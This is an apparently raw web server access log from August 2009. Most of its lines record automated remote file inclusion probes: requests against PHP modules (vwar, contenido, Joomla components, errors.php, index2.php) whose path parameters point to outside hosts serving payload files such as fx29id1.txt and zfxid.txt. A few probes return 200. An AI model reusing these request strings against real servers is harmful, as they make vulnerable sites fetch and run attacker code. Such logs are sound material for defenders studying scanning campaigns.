69.174.114.20 - - [16/Aug/2009:04:27:21 -0500] "GET /logs//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:21 -0500] "GET /logs/access_log.1236902400//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
69.174.114.20 - - [16/Aug/2009:04:27:25 -0500] "GET /logs/access_log.1240704000//cron.php?include_path=http://www.flintriver.co.uk/upload/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:43 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:43 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:43 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:44 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:44 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:44 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:49 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:49 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:49 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:50 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:50 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:50 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:51 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:51 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:51 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:52 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:52 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:52 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:56 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:56 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:56 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:56 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:56 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:28:56 -0500] "GET /logs/access_log.1241049600%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:04:28:58 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:04:28:58 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:04:28:58 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:04:29:01 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:04:30:57 -0500] "GET /logs/access_log.1241049600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:04:30:57 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
207.158.22.128 - - [16/Aug/2009:04:30:57 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
86.39.131.85 - - [16/Aug/2009:04:31:15 -0500] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
86.39.131.85 - - [16/Aug/2009:04:31:15 -0500] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
86.39.131.85 - - [16/Aug/2009:04:31:15 -0500] "GET /logs/access_log.1245628800//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
86.39.131.85 - - [16/Aug/2009:04:31:22 -0500] "GET /logs/access_log.1245715200//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:32:23 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:32:23 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:25 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:27 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:28 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:28 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:28 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:31 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:32:32 -0500] "GET /logs/access_log.1229904000//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:35 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.142.209.134 - - [16/Aug/2009:04:32:38 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:32:59 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:32:59 -0500] "GET /logs/access_log.1229904000//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:32:59 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.73.17.7 - - [16/Aug/2009:04:33:45 -0500] "GET /logs/access_log.1239062400/////?_zb_path=http://www.princedent.com/bbs/set_up/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
131.203.76.246 - - [16/Aug/2009:04:33:50 -0500] "GET /logs//errors.php?error=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
131.203.76.246 - - [16/Aug/2009:04:33:50 -0500] "GET /logs/access_log.1237075200//errors.php?error=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
131.203.76.246 - - [16/Aug/2009:04:33:55 -0500] "GET //errors.php?error=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:04:34:01 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
131.203.76.246 - - [16/Aug/2009:04:34:21 -0500] "GET /logs/access_log.1236038400//errors.php?error=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.53.96.178 - - [16/Aug/2009:04:34:45 -0500] "GET /logs/access_log.1244764800//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.53.96.178 - - [16/Aug/2009:04:34:45 -0500] "GET //modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.53.96.178 - - [16/Aug/2009:04:34:46 -0500] "GET /logs//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.53.96.178 - - [16/Aug/2009:04:34:48 -0500] "GET /logs/access_log.1244764800//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.96.178 - - [16/Aug/2009:04:34:48 -0500] "GET //modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.96.178 - - [16/Aug/2009:04:34:48 -0500] "GET /logs//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
116.122.158.207 - - [16/Aug/2009:04:34:51 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:04:36:19 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:04:36:19 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:04:36:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:04:36:55 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:04:37:00 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:04:37:02 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:37:09 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:37:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:37:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:37:19 -0500] "GET /modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:37:20 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:37:20 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
62.99.247.91 - - [16/Aug/2009:04:40:54 -0500] "GET /logs/access_log.1236211200//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stichtingsamaanta.nl/templates/beez/images_general/.r/id.txt?cmd? HTTP/1.1" 404 375 "-""Mozilla/5.0"
62.99.247.91 - - [16/Aug/2009:04:41:18 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.stichtingsamaanta.nl/templates/beez/images_general/.r/id.txt?cmd? HTTP/1.1" 404 375 "-""Mozilla/5.0"
65.55.208.130 - - [16/Aug/2009:04:43:09 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [16/Aug/2009:04:43:09 -0500] "GET /logs/access_log.1236211200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
193.34.16.183 - - [16/Aug/2009:04:46:33 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
65.55.207.76 - - [16/Aug/2009:04:47:31 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
98.223.10.64 - - [16/Aug/2009:04:47:46 -0500] "GET /logs/access_log.1236038400/modules/xfsection/modify.php?dir_module=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.55.207.76 - - [16/Aug/2009:04:48:16 -0500] "GET /logs/access_log.1131840000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.53.96.178 - - [16/Aug/2009:04:50:14 -0500] "GET /logs/access_log.1239062400//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.53.96.178 - - [16/Aug/2009:04:50:21 -0500] "GET /logs/access_log.1236902400//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
74.53.96.178 - - [16/Aug/2009:04:50:36 -0500] "GET /logs/access_log.1239062400//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.96.178 - - [16/Aug/2009:04:50:37 -0500] "GET /logs/access_log.1236902400//modifyform.html?code=http://www.investment.kg/en/installationx/tukulid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
115.88.240.91 - - [16/Aug/2009:04:51:24 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:04:51:24 -0500] "GET /logs/access_log.1247788800//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:04:51:24 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:04:51:26 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:04:51:33 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:04:51:33 -0500] "GET /logs/access_log.1247788800//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:04:51:34 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:54:09 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:54:39 -0500] "GET /logs/access_log.1247788800//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:54:39 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
110.45.144.23 - - [16/Aug/2009:04:54:41 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:54:44 -0500] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:54:44 -0500] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:54:46 -0500] "GET /logs/access_log.1243728000//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:54:49 -0500] "GET /logs/access_log.1243641600//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:55:49 -0500] "GET //skin/zero_vote/error.php?dir=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:55:49 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
98.223.10.64 - - [16/Aug/2009:04:55:49 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:11 -0500] "GET /logs/access_log.1248134400/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:11 -0500] "GET /index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:11 -0500] "GET /logs/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:11 -0500] "GET /logs/access_log.1247961600/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:26 -0500] "GET /logs/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:26 -0500] "GET /index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:26 -0500] "GET /logs/access_log.1248134400/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:57:27 -0500] "GET /logs/access_log.1247961600/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:04:57:45 -0500] "GET /logs/errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:04:57:45 -0500] "GET /errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:04:57:45 -0500] "GET /logs/access_log.1236038400/errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:58:06 -0500] "GET /logs/access_log.1247875200/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.15 - - [16/Aug/2009:04:58:06 -0500] "GET /logs/access_log.1235692800/errors.php?error=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:04:58:22 -0500] "GET /logs/access_log.1235692800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
99.198.108.66 - - [16/Aug/2009:04:58:41 -0500] "GET /logs/access_log.1247875200/index2.php?DoAction=http://www.avacap.org/db/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:04:58:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
